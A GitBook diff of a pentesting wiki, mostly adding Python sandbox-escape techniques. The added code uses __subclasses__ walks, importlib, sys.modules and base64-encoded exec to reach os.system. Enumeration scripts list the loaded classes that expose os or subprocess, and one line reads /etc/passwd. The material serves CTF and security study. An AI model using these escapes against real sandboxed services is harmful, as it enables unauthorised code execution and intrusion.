GitBook: [master] 9 pages and 12 assets modified
Before Width: | Height: | Size: 341 KiB After Width: | Height: | Size: 341 KiB |
Before Width: | Height: | Size: 341 KiB After Width: | Height: | Size: 341 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 10 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 10 KiB |
BIN
.gitbook/assets/image (507) (2).png
Normal file
After Width: | Height: | Size: 35 KiB |
Before Width: | Height: | Size: 35 KiB After Width: | Height: | Size: 19 KiB |
Before Width: | Height: | Size: 96 KiB After Width: | Height: | Size: 96 KiB |
|
@ -1,4 +1,5 @@
|
||||||
# CTF Write-ups
|
# CTF Write-ups
|
||||||
|
|
||||||
- [Write-up factory](https://writeup.raw.pm/) - Seach engine to find write-ups (TryHackMe, HackTheBox, etc.)
|
* [Write-up factory](https://writeup.raw.pm/) - Seach engine to find write-ups \(TryHackMe, HackTheBox, etc.\)
|
||||||
- [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime
|
* [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime
|
||||||
|
|
||||||
|
|
|
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
||||||
|
|
||||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
|
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
|
||||||
|
|
||||||
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%281%29.png)
|
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
||||||
|
|
||||||
### USB Detective
|
### USB Detective
|
||||||
|
|
||||||
|
|
|
@ -18,36 +18,35 @@ pty.spawn("ls")
|
||||||
pty.spawn("/bin/bash")
|
pty.spawn("/bin/bash")
|
||||||
platform.os.system("ls")
|
platform.os.system("ls")
|
||||||
|
|
||||||
|
#Import functions to execute commands
|
||||||
|
importlib.import_module("os").system("ls")
|
||||||
|
importlib.__import__("os").system("ls")
|
||||||
|
imp.load_source("os","/usr/lib/python3.8/os.py").system("ls")
|
||||||
|
imp.os.system("ls")
|
||||||
|
imp.sys.modules["os"].system("ls")
|
||||||
|
sys.modules["os"].system("ls")
|
||||||
|
__import__("os").system("ls")
|
||||||
|
import os
|
||||||
|
from os import *
|
||||||
|
|
||||||
#Other interesting functions
|
#Other interesting functions
|
||||||
open("/etc/passwd").read()
|
open("/etc/passwd").read()
|
||||||
open('/var/www/html/input', 'w').write('123')
|
open('/var/www/html/input', 'w').write('123')
|
||||||
```
|
|
||||||
|
|
||||||
Remember that the _**open**_ and _**read**_ functions can be useful to **read files** inside the python sandbox and to **write some code** that you could **execute** to **bypass** the sandbox.
|
#In Python2.7
|
||||||
Python2 **input\(\)** function allows to execute python code before the program crashes.
|
|
||||||
|
|
||||||
### Importing
|
|
||||||
|
|
||||||
```python
|
|
||||||
import os
|
|
||||||
from os import *
|
|
||||||
__import__('os').system("ls")
|
|
||||||
```
|
|
||||||
|
|
||||||
If **`sys`**module is present, you can use it to access **`os`**library for example:
|
|
||||||
|
|
||||||
```python
|
|
||||||
sys.modules["os"].system("ls")
|
|
||||||
```
|
|
||||||
|
|
||||||
You can also import libraries and any file is using **`execfile()`** \(python2\):
|
|
||||||
|
|
||||||
```python
|
|
||||||
execfile('/usr/lib/python2.7/os.py')
|
execfile('/usr/lib/python2.7/os.py')
|
||||||
system('ls')
|
system('ls')
|
||||||
```
|
```
|
||||||
|
|
||||||
Python try to **load libraries from the current directory first**: `python3 -c 'import sys; print(sys.path)'`
|
Remember that the _**open**_ and _**read**_ functions can be useful to **read files** inside the python sandbox and to **write some code** that you could **execute** to **bypass** the sandbox.
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
Python2 **input\(\)** function allows to execute python code before the program crashes.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
Python try to **load libraries from the current directory first** \(the following command will print where is python loading modules from\): `python3 -c 'import sys; print(sys.path)'`
|
||||||
|
|
||||||
|
![](../../.gitbook/assets/image%20%28533%29.png)
|
||||||
|
|
||||||
## Bypass pickle sandbox with default installed python packages
|
## Bypass pickle sandbox with default installed python packages
|
||||||
|
|
||||||
|
@ -89,7 +88,7 @@ You can download the package to create the reverse shell here. Please, note that
|
||||||
This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
|
This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
## Executing python code
|
## Eval-ing python code
|
||||||
|
|
||||||
This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction:
|
This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction:
|
||||||
|
|
||||||
|
@ -114,7 +113,7 @@ exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
|
||||||
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
|
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
|
||||||
```
|
```
|
||||||
|
|
||||||
### Compiling
|
## Compiling Python to bypass Defenses
|
||||||
|
|
||||||
In a previous example you can see how to execute any python code using the `compile` function. This is really interesting because you can execute whole scripts with loops and everything in a one liner \(and we could do the same using `exec`\).
|
In a previous example you can see how to execute any python code using the `compile` function. This is really interesting because you can execute whole scripts with loops and everything in a one liner \(and we could do the same using `exec`\).
|
||||||
Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF** \(for example because we don't have the `compile` function in the CTF\).
|
Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF** \(for example because we don't have the `compile` function in the CTF\).
|
||||||
|
@ -141,7 +140,7 @@ names = ('open','read')
|
||||||
# And execute it using eval/exec
|
# And execute it using eval/exec
|
||||||
eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ()))
|
eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ()))
|
||||||
|
|
||||||
#You could also execut it directly
|
#You could also execute it directly
|
||||||
import __builtin__
|
import __builtin__
|
||||||
mydict = {}
|
mydict = {}
|
||||||
mydict['__builtins__'] = __builtin__
|
mydict['__builtins__'] = __builtin__
|
||||||
|
@ -161,8 +160,8 @@ f(42)
|
||||||
|
|
||||||
## Builtins
|
## Builtins
|
||||||
|
|
||||||
[Builtins functions of python2
|
* [Builtins functions of python2](https://docs.python.org/2/library/functions.html)
|
||||||
](https://docs.python.org/2/library/functions.html)[Builtins functions of python3](https://docs.python.org/3/library/functions.html)
|
* [Builtins functions of python3](https://docs.python.org/3/library/functions.html)
|
||||||
|
|
||||||
If you can access to the**`__builtins__`** object you can import libraries \(notice that you could also use here other string representation showed in last section\):
|
If you can access to the**`__builtins__`** object you can import libraries \(notice that you could also use here other string representation showed in last section\):
|
||||||
|
|
||||||
|
@ -172,7 +171,10 @@ __builtins__.__dict__['__import__']("os").system("ls")
|
||||||
|
|
||||||
### No Builtins
|
### No Builtins
|
||||||
|
|
||||||
When you don't have \_\_builtins\_\_ you are not going to be able to import anything nor even read or write files. But there is a way to take that functionality back:
|
When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** \(like `open`, `import`, `print`...\) **aren't loaded**.
|
||||||
|
However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**.
|
||||||
|
|
||||||
|
In the following examples you can observe how to **abuse** some of this "**benign**" modules loaded to **access** **dangerous** **functionalities** inside of them.
|
||||||
|
|
||||||
**Python2**
|
**Python2**
|
||||||
|
|
||||||
|
@ -203,8 +205,21 @@ get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
|
||||||
# Obtain the builtins from a defined function
|
# Obtain the builtins from a defined function
|
||||||
get_flag.__globals__['__builtins__'].__import__("os").system("ls")
|
get_flag.__globals__['__builtins__'].__import__("os").system("ls")
|
||||||
|
|
||||||
|
|
||||||
# The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__)
|
# The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__)
|
||||||
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__ == '_wrap_close' ][0]['system']('ls')
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')
|
||||||
|
[ x for x in ''.__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0]('ls')
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'subprocess." in str(x) ][0]['Popen']('ls')
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"].system("ls")
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].import_module("os").system("ls")
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].__import__("os").system("ls")
|
||||||
|
|
||||||
|
# In the previous example ''.__class__.__base__.__subclasses__() is used
|
||||||
|
# You can also use:
|
||||||
|
# [].__class__.__base__.__subclasses__()
|
||||||
|
# {}.__class__.__base__.__subclasses__()
|
||||||
|
# ().__class__.__base__.__subclasses__()
|
||||||
|
# bool.__class__.__base__.__subclasses__()
|
||||||
|
|
||||||
#If attr is present
|
#If attr is present
|
||||||
(''|attr('___class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()
|
(''|attr('___class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()
|
||||||
|
@ -219,6 +234,94 @@ __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__
|
||||||
__builtins__["__import__"]('os').system('ls')
|
__builtins__["__import__"]('os').system('ls')
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Discovering more loaded methods for arbitrary execution
|
||||||
|
|
||||||
|
Here I want to explain how to easily discover more dangerous functionalities loaded and propose more reliable exploits.
|
||||||
|
For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**:
|
||||||
|
|
||||||
|
```python
|
||||||
|
[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ]
|
||||||
|
['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']
|
||||||
|
```
|
||||||
|
|
||||||
|
There are a lot, and we just need one to execute commands:
|
||||||
|
|
||||||
|
```python
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
|
||||||
|
```
|
||||||
|
|
||||||
|
We can do the same thing with **other libraries** that we know can be used to execute commands:
|
||||||
|
|
||||||
|
```python
|
||||||
|
#os
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls")
|
||||||
|
#commands (not very common)
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "commands" in x.__init__.__globals__ ][0]["commands"].getoutput("ls")
|
||||||
|
#subprocess
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "subprocess" in x.__init__.__globals__ ][0]["subprocess"].Popen("ls")
|
||||||
|
#pty (not very common)
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pty" in x.__init__.__globals__ ][0]["pty"].spawn("ls")
|
||||||
|
#importlib
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].import_module("os").system("ls")
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].__import__("os").system("ls")
|
||||||
|
#builtins
|
||||||
|
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"].__import__("os").system("ls")
|
||||||
|
```
|
||||||
|
|
||||||
|
Moreover, we could even search which modules are loading malicious libraries:
|
||||||
|
|
||||||
|
```python
|
||||||
|
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip"]
|
||||||
|
for b in bad_libraries_names:
|
||||||
|
vuln_libs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and b in x.__init__.__globals__ ]
|
||||||
|
print(f"{b}: {', '.join(vuln_libs)}")
|
||||||
|
|
||||||
|
"""
|
||||||
|
os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
|
||||||
|
commands:
|
||||||
|
subprocess: BaseDependency, Origin, Version, Package
|
||||||
|
pty:
|
||||||
|
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
|
||||||
|
imp:
|
||||||
|
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
|
||||||
|
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature
|
||||||
|
"""
|
||||||
|
```
|
||||||
|
|
||||||
|
Moreover, if you think **other libraries** may be able to **invoke functions to execute commands**, we can also **filter by functions names** inside the possible libraries:
|
||||||
|
|
||||||
|
```python
|
||||||
|
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip"]
|
||||||
|
bad_func_names = ["system", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]
|
||||||
|
for b in bad_libraries_names + bad_func_names:
|
||||||
|
vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ]
|
||||||
|
print(f"{b}: {', '.join(vuln_funcs)}")
|
||||||
|
|
||||||
|
"""
|
||||||
|
os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
|
||||||
|
commands:
|
||||||
|
subprocess: BaseDependency, Origin, Version, Package
|
||||||
|
pty:
|
||||||
|
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
|
||||||
|
imp:
|
||||||
|
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
|
||||||
|
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature
|
||||||
|
pip:
|
||||||
|
system: _wrap_close, _wrap_close
|
||||||
|
getstatusoutput: CompletedProcess, Popen
|
||||||
|
getoutput: CompletedProcess, Popen
|
||||||
|
call: CompletedProcess, Popen
|
||||||
|
Popen: CompletedProcess, Popen
|
||||||
|
spawn:
|
||||||
|
import_module:
|
||||||
|
__import__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec
|
||||||
|
load_source: NullImporter, _HackedGetData
|
||||||
|
execfile:
|
||||||
|
execute:
|
||||||
|
__builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPRequest, _Poly1305Context, PSS, OAEP, MGF1, _RSASignatureContext, _RSAVerificationContext, _RSAPrivateKey, _RSAPublicKey, _X25519PublicKey, _X25519PrivateKey, _X448PublicKey, _X448PrivateKey, Scrypt, PKCS7SignatureBuilder, Backend, GetCipherByName, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, RawJSON, JSONDecoder, JSONEncoder, Cookie, CookieJar, MockRequest, MockResponse, Response, BaseAdapter, UnixHTTPConnection, monkeypatch, JSONDecoder, JSONEncoder, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
|
||||||
|
"""
|
||||||
|
```
|
||||||
|
|
||||||
### Finding types
|
### Finding types
|
||||||
|
|
||||||
```python
|
```python
|
||||||
|
|
|
@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
|
||||||
5. Reproduce the problem.
|
5. Reproduce the problem.
|
||||||
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
||||||
|
|
||||||
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%281%29.png)
|
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
||||||
|
|
||||||
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
||||||
|
|
||||||
|
|
|
@ -779,7 +779,7 @@ exit;
|
||||||
|
|
||||||
## Resources
|
## Resources
|
||||||
|
|
||||||
In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.
|
In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.
|
||||||
[https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
|
[https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
|
||||||
[https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
|
[https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
|
||||||
|
|
||||||
|
|
|
@ -133,7 +133,7 @@ private_bits = [
|
||||||
* `username` is the user who started this Flask
|
* `username` is the user who started this Flask
|
||||||
* `modname` is flask.app
|
* `modname` is flask.app
|
||||||
* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is Flask
|
* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is Flask
|
||||||
* `getattr(mod, '__file__', None)` is the absolute path of `app.py` in the flask directory (e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). If `app.py` doesn't work, try `app.pyc`
